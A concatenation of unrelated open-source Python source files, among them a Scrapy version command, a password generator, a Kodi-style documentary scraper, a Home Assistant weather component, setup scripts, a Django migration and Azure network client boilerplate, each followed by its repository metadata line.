a[3:6,3:6]=np.sum(timeseries*timeseries)*np.identity(3)
for i,j in zip(angs,timeseries):
a[6:6+nv,0]+=-2.*np.sin(np.dot(n_vectors,i))
a[6:6+nv,3]+=-2.*j*np.sin(np.dot(n_vectors,i))
a[6:6+nv,6:6+nv]+=4.*np.outer(np.sin(np.dot(n_vectors,i)),np.sin(np.dot(n_vectors,i)))
b[:3]+=i
b[3:6]+=j*i
b[6:6+nv]+=-2.*i[0]*np.sin(np.dot(n_vectors,i))
b[6+nv:6+2*nv]+=-2.*i[1]*np.sin(np.dot(n_vectors,i))
b[6+2*nv:6+3*nv]+=-2.*i[2]*np.sin(np.dot(n_vectors,i))
a[6+nv:6+2*nv,1]=a[6:6+nv,0]
a[6+2*nv:6+3*nv,2]=a[6:6+nv,0]
a[6+nv:6+2*nv,4]=a[6:6+nv,3]
a[6+2*nv:6+3*nv,5]=a[6:6+nv,3]
a[6+nv:6+2*nv,6+nv:6+2*nv]=a[6:6+nv,6:6+nv]
a[6+2*nv:6+3*nv,6+2*nv:6+3*nv]=a[6:6+nv,6:6+nv]
a[:6,:]=a[:,:6].T
return np.array(solve(a,b))
| adrn/gary | gala/dynamics/_genfunc/solver.py | Python | mit | 5,861 |
import sys
import platform
import twisted
import scrapy
from scrapy.command import ScrapyCommand
class Command(ScrapyCommand):
def syntax(self):
return "[-v]"
def short_desc(self):
return "Print Scrapy version"
def add_options(self, parser):
ScrapyCommand.add_options(self, parser)
parser.add_option("--verbose", "-v", dest="verbose", action="store_true",
help="also display twisted/python/platform info (useful for bug reports)")
def run(self, args, opts):
if opts.verbose:
try:
import lxml.etree
except ImportError:
lxml_version = libxml2_version = "(lxml not available)"
else:
lxml_version = ".".join(map(str, lxml.etree.LXML_VERSION))
libxml2_version = ".".join(map(str, lxml.etree.LIBXML_VERSION))
print "Scrapy : %s" % scrapy.__version__
print "lxml : %s" % lxml_version
print "libxml2 : %s" % libxml2_version
print "Twisted : %s" % twisted.version.short()
print "Python : %s" % sys.version.replace("\n", "- ")
print "Platform: %s" % platform.platform()
else:
print "Scrapy %s" % scrapy.__version__
| pablohoffman/scrapy | scrapy/commands/version.py | Python | bsd-3-clause | 1,277 |
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2015 Dean Jackson <deanishe@deanishe.net>
#
# MIT Licence. See http://opensource.org/licenses/MIT
#
# Created on 2015-07-27
#
"""
Generate password from (mostly) gibberish words.
http://stackoverflow.com/a/5502875/356942
"""
from __future__ import print_function, unicode_literals, absolute_import
import itertools
import string
from generators import WordGenBase
initial_consonants = (
set(string.ascii_lowercase) - set('aeiou')
# remove those easily confused with others
- set('qxc')
# add some crunchy clusters
| set(['bl', 'br', 'cl', 'cr', 'dr', 'fl',
'fr', 'gl', 'gr', 'pl', 'pr', 'sk',
'sl', 'sm', 'sn', 'sp', 'st', 'str',
'sw', 'tr'])
)
final_consonants = (
set(string.ascii_lowercase) - set('aeiou')
# confusable
- set('qxcsj')
# crunchy clusters
| set(['ct', 'ft', 'mp', 'nd', 'ng', 'nk', 'nt',
'pt', 'sk', 'sp', 'ss', 'st'])
)
vowels = 'aeiou'
class PronounceableGenerator(WordGenBase):
"""Generate passwords based on (mostly) gibberish words.
Better entropy (so stronger passwords for the same bits) than
the dictionary-based generator (``WordlistGenerator``), but
a bit harder to remember.
The words in the passwords are joined with hyphens, but these are
not included in the calculation of password strength.
"""
def __init__(self):
self._syllables = None
@property
def data(self):
if not self._syllables:
# each syllable is consonant-vowel-consonant "pronounceable"
self._syllables = map(''.join,
itertools.product(initial_consonants,
vowels,
final_consonants))
return self._syllables
@property
def id(self):
return 'pronounceable'
@property
def name(self):
return 'Pronounceable Nonsense'
@property
def description(self):
return 'Pronounceable, (mostly) nonsense words'
if __name__ == '__main__':
gen = PronounceableGenerator()
print(gen.password(length=30))
| deanishe/alfred-pwgen | src/generators/gen_pronounceable.py | Python | mit | 2,220 |
#!/usr/bin/env python
from distutils.core import setup
setup(
name='graphitesend',
version='0.7.0',
description='A simple interface for sending metrics to Graphite',
author='Danny Lawrence',
author_email='dannyla@linux.com',
url='https://github.com/daniellawrence/graphitesend',
packages=['graphitesend'],
long_description="https://github.com/daniellawrence/graphitesend",
entry_points={
'console_scripts': [
'graphitesend = graphitesend.graphitesend:cli',
],
},
extras_require={
'asynchronous': ['gevent>=1.0.0'],
}
)
| PabloLefort/graphitesend | setup.py | Python | apache-2.0 | 604 |
#----------------------------------------------------------------------
# Copyright (c) 2013 Raytheon BBN Technologies
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and/or hardware specification (the "Work") to
# deal in the Work without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Work, and to permit persons to whom the Work
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Work.
#
# THE WORK IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS
# IN THE WORK.
#----------------------------------------------------------------------
# Class to generate command files to install OpenStack Folsom
# Per OpenStack Folsum Guide (revised for Ubuntu Precise)
import os, errno
from gram.am.gram import config
import Glance, Keystone, Nova, OpenVSwitch, RabbitMQ, MySQL
import OperatingSystem, Quantum, Hypervisor
class OpenStack:
def __init__(self):
pass
_CONTROL_INSTALLERS = [
{
"name": "operating_system_control",
"installer" : OperatingSystem.OperatingSystem(control_node=True)
},
{
"name": "mysql",
"installer": MySQL.MySQL()
},
{
"name": "rabbitmq",
"installer": RabbitMQ.RabbitMQ()
},
{
"name": "keystone",
"installer": Keystone.Keystone()
},
{
"name": "glance",
"installer": Glance.Glance()
},
{
"name": "nova_control",
"installer": Nova.Nova(control_node=True)
},
{
"name": "openvswitch_control",
"installer": OpenVSwitch.OpenVSwitch(control_node=True)
},
{
"name": "quantum",
"installer": Quantum.Quantum()
}
]
_COMPUTE_INSTALLERS = [
{
"name": "operating_system_compute",
"installer" : OperatingSystem.OperatingSystem(control_node=False)
},
{
"name": "hypervisor",
"installer": Hypervisor.Hypervisor()
},
{
"name": "nova_compute",
"installer": Nova.Nova(control_node=False)
},
{
"name": "openvswitch_compute",
"installer": OpenVSwitch.OpenVSwitch(control_node=False)
}
]
def createCommands(self, \
installers,
directory,
install_filename,
uninstall_filename):
try:
os.makedirs(directory)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(directory):
pass
else: raise
install_file = open(directory + "/" + install_filename, 'w')
uninstall_file = open(directory + "/" + uninstall_filename, 'w')
for module in installers:
module_name = module["name"]
module_installer = module["installer"]
if module_name != "operating_system_control" and module_name != "operating_system_compute":
install_file.write("%s/install_%s.sh\n" % \
(directory, module_name))
uninstall_file.write("%s/uninstall_%s.sh\n" % \
(directory, module_name))
self.installerCommands(directory, module_name, \
module_installer, True)
self.installerCommands(directory, module_name, \
module_installer, False)
install_file.close()
uninstall_file.close()
def installerCommands(self, dir, module_name, module_installer, install):
prefix = "install"
if not install:
prefix = "uninstall"
module_install_file = open("%s/%s_%s.sh" % (dir, prefix, module_name), "w")
module_installer.clear()
if install:
module_installer.installCommands()
else:
module_installer.uninstallCommands()
module_install_commands = module_installer.getCommands()
for ic in module_install_commands:
module_install_file.write(ic)
module_install_file.write("\n")
module_install_file.close()
if __name__ == "__main__":
config.initialize("/etc/gram/config.json")
openstack = OpenStack()
openstack.createCommands(OpenStack._CONTROL_INSTALLERS, \
"/tmp/install",
"install_control.sh", \
"uninstall_control.sh")
openstack.createCommands(OpenStack._COMPUTE_INSTALLERS, \
"/tmp/install",
"install_compute.sh", \
"uninstall_compute.sh")
| GENI-NSF/gram | grizzly/install/OpenStack.py | Python | mit | 5,584 |
# -*- coding: utf-8 -*-
# ------------------------------------------------------------
# pelisalacarta - XBMC Plugin
# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/
# ------------------------------------------------------------
import re
from core import httptools
from core import logger
from core import scrapertools
from core.item import Item
HOST = "http://documentales-online.com/"
def mainlist(item):
logger.info()
itemlist = list()
itemlist.append(Item(channel=item.channel, title="Novedades", action="listado", url=HOST))
itemlist.append(Item(channel=item.channel, title="Destacados", action="seccion", url=HOST, extra="destacados"))
itemlist.append(Item(channel=item.channel, title="Series Destacadas", action="seccion", url=HOST, extra="series"))
# itemlist.append(Item(channel=item.channel, title="Top 100", action="categorias", url=HOST))
# itemlist.append(Item(channel=item.channel, title="Populares", action="categorias", url=HOST))
itemlist.append(Item(channel=item.channel, title="Buscar por:"))
itemlist.append(Item(channel=item.channel, title=" Título", action="search"))
itemlist.append(Item(channel=item.channel, title=" Categorías", action="categorias", url=HOST))
# itemlist.append(Item(channel=item.channel, title=" Series y Temas", action="categorias", url=HOST))
return itemlist
def seccion(item):
logger.info()
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t|\s{2}|-\s", "", data)
if item.extra == "destacados":
patron_seccion = '<h4 class="widget-title">Destacados</h4><div class="textwidget"><ul>(.*?)</ul>'
action = "findvideos"
else:
patron_seccion = '<h4 class="widget-title">Series destacadas</h4><div class="textwidget"><ul>(.*?)</ul>'
action = "listado"
data = scrapertools.find_single_match(data, patron_seccion)
matches = re.compile('<a href="([^"]+)">(.*?)</a>', re.DOTALL).findall(data)
aux_action = action
for url, title in matches:
if item.extra != "destacados" and "Cosmos (Carl Sagan)" in title:
action = "findvideos"
else:
action = aux_action
itemlist.append(item.clone(title=title, url=url, action=action, fulltitle=title))
return itemlist
def listado(item):
logger.info()
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t|\s{2}|-\s", "", data)
pagination = scrapertools.find_single_match(data, '<div class="older"><a href="([^"]+)"')
if not pagination:
pagination = scrapertools.find_single_match(data, '<span class=\'current\'>\d</span>'
'<a class="page larger" href="([^"]+)">')
patron = '<ul class="sp-grid">(.*?)</ul>'
data = scrapertools.find_single_match(data, patron)
matches = re.compile('<a href="([^"]+)">(.*?)</a>', re.DOTALL).findall(data)
for url, title in matches:
itemlist.append(item.clone(title=title, url=url, action="findvideos", fulltitle=title))
if pagination:
itemlist.append(item.clone(title=">> Página siguiente", url=pagination))
return itemlist
def categorias(item):
logger.info()
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t|\s{2}|-\s", "", data)
data = scrapertools.find_single_match(data, 'a href="#">Categorías</a><ul class="sub-menu">(.*?)</ul>')
matches = re.compile('<a href="([^"]+)">(.*?)</a>', re.DOTALL).findall(data)
for url, title in matches:
itemlist.append(item.clone(title=title, url=url, action="listado", fulltitle=title))
return itemlist
def search(item, texto):
logger.info()
texto = texto.replace(" ", "+")
try:
item.url = HOST + "?s=%s" % texto
return listado(item)
# Se captura la excepción, para no interrumpir al buscador global si un canal falla
except:
import sys
for line in sys.exc_info():
logger.error("%s" % line)
return []
def findvideos(item):
logger.info()
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t|\s{2}|-\s", "", data)
if item.fulltitle == "Cosmos (Carl Sagan)":
matches = scrapertools.find_multiple_matches(data, '<p><strong>(.*?)</strong><br /><iframe.+?src="(https://www\.youtube\.com/[^?]+)')
for title, url in matches:
new_item = item.clone(title=title, url=url)
from core import servertools
aux_itemlist = servertools.find_video_items(new_item)
for videoitem in aux_itemlist:
videoitem.title = new_item.title
videoitem.fulltitle = new_item.title
videoitem.channel = item.channel
# videoitem.thumbnail = item.thumbnail
itemlist.extend(aux_itemlist)
else:
data = scrapertools.find_multiple_matches(data, '<iframe.+?src="(https://www\.youtube\.com/[^?]+)')
from core import servertools
itemlist.extend(servertools.find_video_items(data=",".join(data)))
for videoitem in itemlist:
videoitem.fulltitle = item.fulltitle
videoitem.channel = item.channel
# videoitem.thumbnail = item.thumbnail
return itemlist
| r0balo/pelisalacarta | python/main-classic/channels/documentalesonline.py | Python | gpl-3.0 | 5,391 |
# copyright 2003-2010 LOGILAB S.A. (Paris, FRANCE), all rights reserved.
# contact http://www.logilab.fr/ -- mailto:contact@logilab.fr
# copyright 2003-2010 Sylvain Thenault, all rights reserved.
# contact mailto:thenault@gmail.com
#
# This file is part of logilab-astng.
#
# logilab-astng is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 2.1 of the License, or (at your
# option) any later version.
#
# logilab-astng is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with logilab-astng. If not, see <http://www.gnu.org/licenses/>.
__revision__="$Id: __init__.py,v 1.1 2005-06-13 20:55:20 syt Exp $"
| dbbhattacharya/kitsune | vendor/packages/logilab-astng/test/data/__init__.py | Python | bsd-3-clause | 1,001 |
"""
Weather component that handles meteorological data for your location.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/weather/
"""
import asyncio
import logging
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.helpers.temperature import display_temp as show_temp
from homeassistant.const import PRECISION_WHOLE, PRECISION_TENTHS, TEMP_CELSIUS
from homeassistant.helpers.config_validation import PLATFORM_SCHEMA # noqa
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = []
DOMAIN = 'weather'
ENTITY_ID_FORMAT = DOMAIN + '.{}'
ATTR_CONDITION_CLASS = 'condition_class'
ATTR_FORECAST = 'forecast'
ATTR_FORECAST_TEMP = 'temperature'
ATTR_FORECAST_TIME = 'datetime'
ATTR_WEATHER_ATTRIBUTION = 'attribution'
ATTR_WEATHER_HUMIDITY = 'humidity'
ATTR_WEATHER_OZONE = 'ozone'
ATTR_WEATHER_PRESSURE = 'pressure'
ATTR_WEATHER_TEMPERATURE = 'temperature'
ATTR_WEATHER_VISIBILITY = 'visibility'
ATTR_WEATHER_WIND_BEARING = 'wind_bearing'
ATTR_WEATHER_WIND_SPEED = 'wind_speed'
@asyncio.coroutine
def async_setup(hass, config):
"""Set up the weather component."""
component = EntityComponent(_LOGGER, DOMAIN, hass)
yield from component.async_setup(config)
return True
# pylint: disable=no-member, no-self-use
class WeatherEntity(Entity):
"""ABC for weather data."""
@property
def temperature(self):
"""Return the platform temperature."""
raise NotImplementedError()
@property
def temperature_unit(self):
"""Return the unit of measurement."""
raise NotImplementedError()
@property
def pressure(self):
"""Return the pressure."""
return None
@property
def humidity(self):
"""Return the humidity."""
raise NotImplementedError()
@property
def wind_speed(self):
"""Return the wind speed."""
return None
@property
def wind_bearing(self):
"""Return the wind bearing."""
return None
@property
def ozone(self):
"""Return the ozone level."""
return None
@property
def attribution(self):
"""Return the attribution."""
return None
@property
def visibility(self):
"""Return the visibility."""
return None
@property
def forecast(self):
"""Return the forecast."""
return None
@property
def precision(self):
"""Return the forecast."""
return PRECISION_TENTHS if self.temperature_unit == TEMP_CELSIUS \
else PRECISION_WHOLE
@property
def state_attributes(self):
"""Return the state attributes."""
data = {
ATTR_WEATHER_TEMPERATURE: show_temp(
self.hass, self.temperature, self.temperature_unit,
self.precision),
ATTR_WEATHER_HUMIDITY: self.humidity,
}
ozone = self.ozone
if ozone is not None:
data[ATTR_WEATHER_OZONE] = ozone
pressure = self.pressure
if pressure is not None:
data[ATTR_WEATHER_PRESSURE] = pressure
wind_bearing = self.wind_bearing
if wind_bearing is not None:
data[ATTR_WEATHER_WIND_BEARING] = wind_bearing
wind_speed = self.wind_speed
if wind_speed is not None:
data[ATTR_WEATHER_WIND_SPEED] = wind_speed
visibility = self.visibility
if visibility is not None:
data[ATTR_WEATHER_VISIBILITY] = visibility
attribution = self.attribution
if attribution is not None:
data[ATTR_WEATHER_ATTRIBUTION] = attribution
if self.forecast is not None:
forecast = []
for forecast_entry in self.forecast:
forecast_entry = dict(forecast_entry)
forecast_entry[ATTR_FORECAST_TEMP] = show_temp(
self.hass, forecast_entry[ATTR_FORECAST_TEMP],
self.temperature_unit, self.precision)
forecast.append(forecast_entry)
data[ATTR_FORECAST] = forecast
return data
@property
def state(self):
"""Return the current state."""
return self.condition
@property
def condition(self):
"""Return the current condition."""
raise NotImplementedError()
| ewandor/home-assistant | homeassistant/components/weather/__init__.py | Python | apache-2.0 | 4,427 |
#!/usr/bin/env python
#
# Copyright (C) 2005 Christopher J. Stawarz <chris@pseudogreen.org>
#
# This file is part of i2py.
#
# i2py is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# i2py is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with i2py; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import sys
from distutils.core import setup
# Need to do this to ensure that ytab.py exists and is up to date
import i2py
################################################################################
#
# Generate documentation with pydoc
#
################################################################################
if sys.argv[1] == 'sdist':
import os, os.path
import pydoc
os.chdir('doc')
moddir = os.path.join(os.pardir, 'i2py')
sys.path.insert(0, moddir)
pydoc.writedocs(moddir, 'i2py.')
sys.path.pop(0)
os.chdir(os.pardir)
################################################################################
#
# Run setup()
#
################################################################################
# Grab the description from the package's doc string
desc = i2py.__doc__.split('\n\n')
setup(name='i2py',
version=i2py.__version__,
author='Christopher J. Stawarz',
author_email='chris@pseudogreen.org',
url='http://software.pseudogreen.org/i2py/',
license='http://www.fsf.org/licensing/licenses/gpl.html',
platforms=['any'],
description=desc[0].strip(),
long_description=('\n' + '\n\n'.join(desc[1:]).strip() + '\n'),
packages=['i2py'],
scripts=['idl2python'],
)
| zimmerst/i2py | setup.py | Python | gpl-2.0 | 2,104 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.23 on 2020-06-01 21:22
from __future__ import unicode_literals
from django.db import migrations, models
from django.utils.text import slugify
def migrate_data_forward(apps, schema_editor):
Impresso = apps.get_model('lotes', 'Impresso')
for instance in Impresso.objects.all():
instance.slug = slugify(instance.nome)
instance.save()
def migrate_data_backward(apps, schema_editor):
pass
class Migration(migrations.Migration):
dependencies = [
('lotes', '0049_impresso_slug'),
]
operations = [
migrations.RunPython(
migrate_data_forward,
migrate_data_backward,
),
]
| anselmobd/fo2 | src/lotes/migrations/0050_impresso_slug_init.py | Python | mit | 714 |
print("This is simple2.py")
| sprescott3/cs3240-labdemo | simple2.py | Python | mit | 28 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
from azure.mgmt.core import ARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Optional
from azure.core.credentials import TokenCredential
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from ._configuration import NetworkManagementClientConfiguration
from .operations import ApplicationGatewaysOperations
from .operations import ApplicationSecurityGroupsOperations
from .operations import AvailableDelegationsOperations
from .operations import AvailableResourceGroupDelegationsOperations
from .operations import AzureFirewallsOperations
from .operations import AzureFirewallFqdnTagsOperations
from .operations import NetworkManagementClientOperationsMixin
from .operations import DdosCustomPoliciesOperations
from .operations import DdosProtectionPlansOperations
from .operations import AvailableEndpointServicesOperations
from .operations import ExpressRouteCircuitAuthorizationsOperations
from .operations import ExpressRouteCircuitPeeringsOperations
from .operations import ExpressRouteCircuitConnectionsOperations
from .operations import PeerExpressRouteCircuitConnectionsOperations
from .operations import ExpressRouteCircuitsOperations
from .operations import ExpressRouteServiceProvidersOperations
from .operations import ExpressRouteCrossConnectionsOperations
from .operations import ExpressRouteCrossConnectionPeeringsOperations
from .operations import ExpressRouteGatewaysOperations
from .operations import ExpressRouteConnectionsOperations
from .operations import ExpressRoutePortsLocationsOperations
from .operations import ExpressRoutePortsOperations
from .operations import ExpressRouteLinksOperations
from .operations import InterfaceEndpointsOperations
from .operations import LoadBalancersOperations
from .operations import LoadBalancerBackendAddressPoolsOperations
from .operations import LoadBalancerFrontendIPConfigurationsOperations
from .operations import InboundNatRulesOperations
from .operations import LoadBalancerLoadBalancingRulesOperations
from .operations import LoadBalancerOutboundRulesOperations
from .operations import LoadBalancerNetworkInterfacesOperations
from .operations import LoadBalancerProbesOperations
from .operations import NatGatewaysOperations
from .operations import NetworkInterfacesOperations
from .operations import NetworkInterfaceIPConfigurationsOperations
from .operations import NetworkInterfaceLoadBalancersOperations
from .operations import NetworkInterfaceTapConfigurationsOperations
from .operations import NetworkProfilesOperations
from .operations import NetworkSecurityGroupsOperations
from .operations import SecurityRulesOperations
from .operations import DefaultSecurityRulesOperations
from .operations import NetworkWatchersOperations
from .operations import PacketCapturesOperations
from .operations import ConnectionMonitorsOperations
from .operations import Operations
from .operations import PublicIPAddressesOperations
from .operations import PublicIPPrefixesOperations
from .operations import RouteFiltersOperations
from .operations import RouteFilterRulesOperations
from .operations import RouteTablesOperations
from .operations import RoutesOperations
from .operations import BgpServiceCommunitiesOperations
from .operations import ServiceEndpointPoliciesOperations
from .operations import ServiceEndpointPolicyDefinitionsOperations
from .operations import UsagesOperations
from .operations import VirtualNetworksOperations
from .operations import SubnetsOperations
from .operations import ResourceNavigationLinksOperations
from .operations import ServiceAssociationLinksOperations
from .operations import VirtualNetworkPeeringsOperations
from .operations import VirtualNetworkGatewaysOperations
from .operations import VirtualNetworkGatewayConnectionsOperations
from .operations import LocalNetworkGatewaysOperations
from .operations import VirtualNetworkTapsOperations
from .operations import VirtualWansOperations
from .operations import VpnSitesOperations
from .operations import VpnSitesConfigurationOperations
from .operations import VirtualHubsOperations
from .operations import HubVirtualNetworkConnectionsOperations
from .operations import VpnGatewaysOperations
from .operations import VpnConnectionsOperations
from .operations import P2SVpnServerConfigurationsOperations
from .operations import P2SVpnGatewaysOperations
from .operations import WebApplicationFirewallPoliciesOperations
from . import models
class NetworkManagementClient(NetworkManagementClientOperationsMixin):
"""Network Client.
:ivar application_gateways: ApplicationGatewaysOperations operations
:vartype application_gateways: azure.mgmt.network.v2019_02_01.operations.ApplicationGatewaysOperations
:ivar application_security_groups: ApplicationSecurityGroupsOperations operations
:vartype application_security_groups: azure.mgmt.network.v2019_02_01.operations.ApplicationSecurityGroupsOperations
:ivar available_delegations: AvailableDelegationsOperations operations
:vartype available_delegations: azure.mgmt.network.v2019_02_01.operations.AvailableDelegationsOperations
:ivar available_resource_group_delegations: AvailableResourceGroupDelegationsOperations operations
:vartype available_resource_group_delegations: azure.mgmt.network.v2019_02_01.operations.AvailableResourceGroupDelegationsOperations
:ivar azure_firewalls: AzureFirewallsOperations operations
:vartype azure_firewalls: azure.mgmt.network.v2019_02_01.operations.AzureFirewallsOperations
:ivar azure_firewall_fqdn_tags: AzureFirewallFqdnTagsOperations operations
:vartype azure_firewall_fqdn_tags: azure.mgmt.network.v2019_02_01.operations.AzureFirewallFqdnTagsOperations
:ivar ddos_custom_policies: DdosCustomPoliciesOperations operations
:vartype ddos_custom_policies: azure.mgmt.network.v2019_02_01.operations.DdosCustomPoliciesOperations
:ivar ddos_protection_plans: DdosProtectionPlansOperations operations
:vartype ddos_protection_plans: azure.mgmt.network.v2019_02_01.operations.DdosProtectionPlansOperations
:ivar available_endpoint_services: AvailableEndpointServicesOperations operations
:vartype available_endpoint_services: azure.mgmt.network.v2019_02_01.operations.AvailableEndpointServicesOperations
:ivar express_route_circuit_authorizations: ExpressRouteCircuitAuthorizationsOperations operations
:vartype express_route_circuit_authorizations: azure.mgmt.network.v2019_02_01.operations.ExpressRouteCircuitAuthorizationsOperations
:ivar express_route_circuit_peerings: ExpressRouteCircuitPeeringsOperations operations
:vartype express_route_circuit_peerings: azure.mgmt.network.v2019_02_01.operations.ExpressRouteCircuitPeeringsOperations
:ivar express_route_circuit_connections: ExpressRouteCircuitConnectionsOperations operations
:vartype express_route_circuit_connections: azure.mgmt.network.v2019_02_01.operations.ExpressRouteCircuitConnectionsOperations
:ivar peer_express_route_circuit_connections: PeerExpressRouteCircuitConnectionsOperations operations
:vartype peer_express_route_circuit_connections: azure.mgmt.network.v2019_02_01.operations.PeerExpressRouteCircuitConnectionsOperations
:ivar express_route_circuits: ExpressRouteCircuitsOperations operations
:vartype express_route_circuits: azure.mgmt.network.v2019_02_01.operations.ExpressRouteCircuitsOperations
:ivar express_route_service_providers: ExpressRouteServiceProvidersOperations operations
:vartype express_route_service_providers: azure.mgmt.network.v2019_02_01.operations.ExpressRouteServiceProvidersOperations
:ivar express_route_cross_connections: ExpressRouteCrossConnectionsOperations operations
:vartype express_route_cross_connections: azure.mgmt.network.v2019_02_01.operations.ExpressRouteCrossConnectionsOperations
:ivar express_route_cross_connection_peerings: ExpressRouteCrossConnectionPeeringsOperations operations
:vartype express_route_cross_connection_peerings: azure.mgmt.network.v2019_02_01.operations.ExpressRouteCrossConnectionPeeringsOperations
:ivar express_route_gateways: ExpressRouteGatewaysOperations operations
:vartype express_route_gateways: azure.mgmt.network.v2019_02_01.operations.ExpressRouteGatewaysOperations
:ivar express_route_connections: ExpressRouteConnectionsOperations operations
:vartype express_route_connections: azure.mgmt.network.v2019_02_01.operations.ExpressRouteConnectionsOperations
:ivar express_route_ports_locations: ExpressRoutePortsLocationsOperations operations
:vartype express_route_ports_locations: azure.mgmt.network.v2019_02_01.operations.ExpressRoutePortsLocationsOperations
:ivar express_route_ports: ExpressRoutePortsOperations operations
:vartype express_route_ports: azure.mgmt.network.v2019_02_01.operations.ExpressRoutePortsOperations
:ivar express_route_links: ExpressRouteLinksOperations operations
:vartype express_route_links: azure.mgmt.network.v2019_02_01.operations.ExpressRouteLinksOperations
:ivar interface_endpoints: InterfaceEndpointsOperations operations
:vartype interface_endpoints: azure.mgmt.network.v2019_02_01.operations.InterfaceEndpointsOperations
:ivar load_balancers: LoadBalancersOperations operations
:vartype load_balancers: azure.mgmt.network.v2019_02_01.operations.LoadBalancersOperations
:ivar load_balancer_backend_address_pools: LoadBalancerBackendAddressPoolsOperations operations
:vartype load_balancer_backend_address_pools: azure.mgmt.network.v2019_02_01.operations.LoadBalancerBackendAddressPoolsOperations
:ivar load_balancer_frontend_ip_configurations: LoadBalancerFrontendIPConfigurationsOperations operations
:vartype load_balancer_frontend_ip_configurations: azure.mgmt.network.v2019_02_01.operations.LoadBalancerFrontendIPConfigurationsOperations
:ivar inbound_nat_rules: InboundNatRulesOperations operations
:vartype inbound_nat_rules: azure.mgmt.network.v2019_02_01.operations.InboundNatRulesOperations
:ivar load_balancer_load_balancing_rules: LoadBalancerLoadBalancingRulesOperations operations
:vartype load_balancer_load_balancing_rules: azure.mgmt.network.v2019_02_01.operations.LoadBalancerLoadBalancingRulesOperations
:ivar load_balancer_outbound_rules: LoadBalancerOutboundRulesOperations operations
:vartype load_balancer_outbound_rules: azure.mgmt.network.v2019_02_01.operations.LoadBalancerOutboundRulesOperations
:ivar load_balancer_network_interfaces: LoadBalancerNetworkInterfacesOperations operations
:vartype load_balancer_network_interfaces: azure.mgmt.network.v2019_02_01.operations.LoadBalancerNetworkInterfacesOperations
:ivar load_balancer_probes: LoadBalancerProbesOperations operations
:vartype load_balancer_probes: azure.mgmt.network.v2019_02_01.operations.LoadBalancerProbesOperations
:ivar nat_gateways: NatGatewaysOperations operations
:vartype nat_gateways: azure.mgmt.network.v2019_02_01.operations.NatGatewaysOperations
:ivar network_interfaces: NetworkInterfacesOperations operations
:vartype network_interfaces: azure.mgmt.network.v2019_02_01.operations.NetworkInterfacesOperations
:ivar network_interface_ip_configurations: NetworkInterfaceIPConfigurationsOperations operations
:vartype network_interface_ip_configurations: azure.mgmt.network.v2019_02_01.operations.NetworkInterfaceIPConfigurationsOperations
:ivar network_interface_load_balancers: NetworkInterfaceLoadBalancersOperations operations
:vartype network_interface_load_balancers: azure.mgmt.network.v2019_02_01.operations.NetworkInterfaceLoadBalancersOperations
:ivar network_interface_tap_configurations: NetworkInterfaceTapConfigurationsOperations operations
:vartype network_interface_tap_configurations: azure.mgmt.network.v2019_02_01.operations.NetworkInterfaceTapConfigurationsOperations
:ivar network_profiles: NetworkProfilesOperations operations
:vartype network_profiles: azure.mgmt.network.v2019_02_01.operations.NetworkProfilesOperations
:ivar network_security_groups: NetworkSecurityGroupsOperations operations
:vartype network_security_groups: azure.mgmt.network.v2019_02_01.operations.NetworkSecurityGroupsOperations
:ivar security_rules: SecurityRulesOperations operations
:vartype security_rules: azure.mgmt.network.v2019_02_01.operations.SecurityRulesOperations
:ivar default_security_rules: DefaultSecurityRulesOperations operations
:vartype default_security_rules: azure.mgmt.network.v2019_02_01.operations.DefaultSecurityRulesOperations
:ivar network_watchers: NetworkWatchersOperations operations
:vartype network_watchers: azure.mgmt.network.v2019_02_01.operations.NetworkWatchersOperations
:ivar packet_captures: PacketCapturesOperations operations
:vartype packet_captures: azure.mgmt.network.v2019_02_01.operations.PacketCapturesOperations
:ivar connection_monitors: ConnectionMonitorsOperations operations
